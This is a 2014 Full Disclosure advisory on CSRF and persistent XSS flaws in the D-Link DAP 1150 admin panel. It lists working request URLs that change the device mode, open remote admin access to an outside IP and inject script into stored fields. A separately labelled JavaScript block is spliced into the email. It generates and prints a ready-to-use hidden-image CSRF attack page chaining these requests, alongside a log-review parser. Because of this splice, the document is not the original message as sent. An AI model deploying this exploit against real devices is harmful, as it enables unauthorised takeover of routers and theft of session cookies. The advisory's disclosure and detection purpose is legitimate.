[FD] Multiple CSRF and XSS vulnerabilities in D-Link DAP 1150
- To: <submissions@xxxxxxxxxxxxxxxxxxxxxxx>, <fulldisclosure@xxxxxxxxxxxx>
- Subject: [FD] Multiple CSRF and XSS vulnerabilities in D-Link DAP 1150
- From: "MustLive" <mustlive@xxxxxxxxxxxxxxxxxx>
- Date: Mon, 28 Apr 2014 23:29:24 +0300
Hello list!
In 2011 and at the beginning of 2012 I wrote about multiple vulnerabilities
(http://securityvulns.ru/docs27440.html,
http://securityvulns.ru/docs27677.html,
http://securityvulns.ru/docs27676.html) in D-Link DAP 1150 (several dozen of them).
At that time I wrote about vulnerabilities in the admin panel in Access Point mode,
and now I will write about holes in Router mode.
I present new vulnerabilities in this device. There are Cross-Site Request
Forgery and Cross-Site Scripting vulnerabilities in D-Link DAP 1150 (Wi-Fi
Access Point and Router).
SecurityVulns ID: 12076.
-------------------------
Affected products:
-------------------------
The following model is vulnerable: D-Link DAP 1150, firmware version 1.2.94. This
model with other firmware versions must also be vulnerable. D-Link ignored
all vulnerabilities in this device (as in other devices which I informed
them about) and still has not fixed them.
----------
Details:
----------
I remind you that in the first report about vulnerabilities in D-Link DAP
1150 (http://securityvulns.ru/docs27440.html), I wrote about CSRF in the login
form and other vulnerabilities, which allow an attacker to remotely log into the
admin panel in order to conduct CSRF and XSS attacks inside the admin panel.
CSRF (WASC-09):
In section Advanced / Device, via CSRF it is possible to change the device mode.
If access point mode is on, then to attack the vulnerabilities in router
mode it is first necessary to switch the device to router mode.
Turn on access point mode:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=112&res_struct_size=0&res_buf={%22device_mode%22:%22ap%22}&res_pos=0
Turn on router mode:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=112&res_struct_size=0&res_buf={%22device_mode%22:%22router%22}&res_pos=0
CSRF (WASC-09):
In section Advanced / Remote access, via CSRF it is possible to add, edit and
delete the remote access settings of the web interface. The following request
allows remote access to the admin panel from IP 50.50.50.50.
Add:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%2250.50.50.50%22,%20%22source_mask%22:%22255.255.255.0%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=-1
Edit:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%2250.50.50.50%22,%20%22source_mask%22:%22255.255.255.0%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=0
Delete:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_config_id=16&res_struct_size=0&res_pos=0
XSS (WASC-08):
These are persistent XSS vulnerabilities. The code executes in section Advanced /
Remote access.
Attack via the add function in parameter res_buf (in fields: IP address, Mask):
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22source_mask%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=-1
Attack via the edit function in parameter res_buf (in fields: IP address, Mask):
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22source_mask%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=0
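The following is an added example, not code from the advisory or from D-Link. It reconstructs the index.cgi request format used by both the CSRF and the XSS sections above (res_config_action, res_config_id, res_buf as percent-encoded JSON, res_pos), chains the mode switch and the remote-access rule into a CSRF proof-of-concept page, and includes a parser that a log reviewer can use to flag such requests. The device address 192.168.0.50, the config ids 112 and 16, the action values 2 and 3 and the field names come from the URLs quoted above; the function names, the `attackChain` ordering and the `isSuspicious` heuristic are assumptions of this example.

```javascript
// Added example (not from the advisory): rebuilds the D-Link DAP 1150
// index.cgi configuration requests quoted above and wraps them in a CSRF
// proof-of-concept page. Config ids / action values are taken from the
// advisory's URLs; the function names and the log-review heuristic are ours.

// Serialise a config object the way the advisory's res_buf is written:
// JSON with ", " between members, then percent-encode only the characters
// the advisory encodes (quote, space, < and >), leaving { } : , raw.
function encodeResBuf(obj) {
  const json = '{' + Object.entries(obj)
    .map(([k, v]) => JSON.stringify(k) + ':' + JSON.stringify(v))
    .join(', ') + '}';
  return json.replace(/["<> ]/g,
    c => '%' + c.charCodeAt(0).toString(16).toUpperCase());
}

// Build one state-changing GET request to index.cgi.
//   action: 3 = write (add when pos is -1, edit when pos is an index),
//           2 = delete (sent without res_buf), as seen in the advisory
//   id:     112 = device mode, 16 = remote access list
function buildRequest({ host = '192.168.0.50', action, id, buf = null, pos }) {
  let url = `http://${host}/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json` +
    `&res_config_action=${action}&res_config_id=${id}&res_struct_size=0`;
  if (buf !== null) url += `&res_buf=${encodeResBuf(buf)}`;
  return url + `&res_pos=${pos}`;
}

// Remote-access rule from the advisory (sport is numeric, dport a string,
// exactly as in the quoted request).
const REMOTE_ACCESS_RULE = {
  ips: '50.50.50.50', source_mask: '255.255.255.0', sport: 80, dport: '80',
};

// The chain described above: force router mode, then add a remote-access
// rule so the attacker's IP may reach the admin panel.
function attackChain(host = '192.168.0.50') {
  return [
    buildRequest({ host, action: 3, id: 112, buf: { device_mode: 'router' }, pos: 0 }),
    buildRequest({ host, action: 3, id: 16, buf: REMOTE_ACCESS_RULE, pos: -1 }),
  ];
}

// Stored XSS variant: the same add request with script tags in the IP and
// mask fields; the payload fires when an admin opens Advanced / Remote access.
function xssRule(payload = '<script>alert(document.cookie)</script>') {
  return { ips: payload, source_mask: payload, sport: 80, dport: '80' };
}

// CSRF proof-of-concept page: every request is a plain GET, so an <img>
// tag is enough to fire it from a browser that holds a session with the
// device. '&' is escaped so the markup is valid HTML.
function csrfPage(urls) {
  const imgs = urls.map(u =>
    `<img src="${u.replace(/&/g, '&amp;')}" width="0" height="0" alt="">`);
  return '<!doctype html>\n<html><body>\n' + imgs.join('\n') + '\n</body></html>\n';
}

// Reverse direction, for log or proxy review: decode an index.cgi URL back
// into action, config id, position and the JSON body. URLSearchParams
// undoes the percent-encoding, so the body parses as ordinary JSON.
function parseRequest(url) {
  const p = new URL(url).searchParams;
  const raw = p.get('res_buf');
  return {
    action: Number(p.get('res_config_action')),
    id: Number(p.get('res_config_id')),
    pos: Number(p.get('res_pos')),
    buf: raw === null ? null : JSON.parse(raw),
  };
}

// Heuristic (ours): flag writes/deletes against the device-mode or
// remote-access config, and any field value carrying an HTML tag.
function isSuspicious(url) {
  const r = parseRequest(url);
  const changesConfig = (r.action === 3 || r.action === 2) && (r.id === 112 || r.id === 16);
  const hasTags = r.buf !== null &&
    Object.values(r.buf).some(v => /<[^>]+>/.test(String(v)));
  return { changesConfig, hasTags };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(csrfPage(attackChain()));
}
```

Running the block prints a page that, when loaded by an administrator whose browser has a session with the device (or after the login CSRF from the earlier report), switches the unit to router mode and opens the admin panel to 50.50.50.50. The device-side fix is the standard one for any state-changing JSON endpoint: refuse GET for writes, bind each write to an unpredictable per-session token checked server-side, and HTML-encode stored fields such as the IP and mask before rendering them in the Remote access page.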
I mentioned these vulnerabilities on my site
(http://websecurity.com.ua/7137/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/